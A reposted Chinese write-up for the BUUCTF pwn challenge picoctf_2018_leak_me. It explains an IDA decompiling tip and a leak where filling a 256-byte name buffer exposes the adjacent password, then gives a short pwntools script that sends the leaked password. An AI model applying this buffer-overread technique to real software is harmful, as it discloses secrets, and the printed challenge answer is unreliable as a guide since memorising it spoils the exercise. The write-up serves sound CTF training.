[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——picoctf_2018_leak_me
題目沒什么難度,但是可能反匯編的時候你們可能會出現一些問題。
peak小知識
pwn題,有時會碰到無法反匯編的情況,大多數情況下,都是call的位置報錯,雙擊函數,按F5人為給它反匯編,再返回就可以了。不過有時候,是IDA棧指針的問題,大多數還是前者居多。
思路
在IDA中,v6代表name s是password.距離0x100也就是256。
輸入256個字符后,我們可以直接將password泄露出來。這樣我們就可以在下面調用flag函數了。
寫個小dome leek出來password再說。
exploit
from pwn import * p = remote("node3.buuoj.cn",27223) p.sendline('a') p.recv() p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 带表头节点单链表及其基本应用
- 下一篇: [BUUCTF-pwn]——mrctf2